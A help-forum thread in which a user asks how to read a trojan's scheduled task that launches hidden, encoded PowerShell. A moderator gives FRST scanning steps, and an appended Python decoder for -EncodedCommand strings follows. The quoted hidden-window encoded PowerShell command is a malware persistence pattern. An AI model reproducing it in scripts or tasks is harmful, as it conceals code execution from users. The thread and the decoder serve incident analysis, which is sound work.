Trojan horse
KingkoPop
bazfile Posts 60845 Status Moderator, Security contributor -
Hello, I had a Trojan horse that infected my machine, and I saw that they added tasks to my Task Scheduler, notably this one, which I have trouble understanding:
In the command prompt it runs this command:
/c powershell -WindowStyle Hidden -E "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"
Having seen this monstrosity, I am wondering how to find the thing that is Hidden so that I can understand what it does with this file.
My question is: how can this thing be found?
Thanks in advance!
2 replies
Hello,
Download FRST. Once it is downloaded, save it to the desktop, then right-click FRST and choose Run as administrator. You will get this:
Click Scan
Caution: wait until the messages saying that the scan is finished are displayed

At the end of the scan you will have two text files on the desktop, FRST and Addition

Then upload the FRST and ADDITION reports to CJOINT (see THIS TUTORIAL), then give the two links generated by Cjoint in your reply.
Hello,
Thanks for your reply, here are the 2 txt files:
Addition.txt : https://www.cjoint.com/c/LFhohXiTonV
FrST.txt : https://www.cjoint.com/c/LFhoifOXM5V
Thanks in advance <3
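
The task action quoted in the first post hands its script to PowerShell through the `-E` (EncodedCommand) switch, whose value is Base64 of UTF-16LE text. As an added example (not part of the thread; the function names and the sample command line are constructed for illustration), this Python code decodes such an argument for reading without running it:

```python
import base64
import re

# A parameter name (dash or slash prefix) followed by a possibly quoted
# Base64-looking value.
_PARAM = re.compile(r"""(?:^|\s)[-/]([A-Za-z]+)\s+["']?([A-Za-z0-9+/=]+)["']?""")


def is_encoded_command_switch(name):
    """powershell.exe accepts any prefix of EncodedCommand (-e, -enc, ...) and -ec."""
    name = name.lower()
    return name == "ec" or "encodedcommand".startswith(name)


def decode_encoded_command(command_line):
    """Return the script text behind -E/-EncodedCommand, or None if absent.

    The payload is only decoded (Base64 -> UTF-16LE text); nothing is executed.
    """
    for name, payload in _PARAM.findall(command_line):
        if not is_encoded_command_switch(name):
            continue  # e.g. -WindowStyle Hidden, -ExecutionPolicy Bypass
        try:
            raw = base64.b64decode(payload, validate=True)
            return raw.decode("utf-16-le")
        except ValueError:
            return None  # truncated, or not really Base64 / UTF-16LE
    return None


# Constructed sample: a harmless script encoded the same way as a task action.
SAMPLE_SCRIPT = "Write-Output 'constructed sample'"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_TASK_ARGS = '/c powershell -WindowStyle Hidden -E "%s"' % SAMPLE_B64

if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_TASK_ARGS))
```

Paste the arguments of the scheduled task's action in place of `SAMPLE_TASK_ARGS` on an analysis machine; the decoded text is what the hidden window would have run.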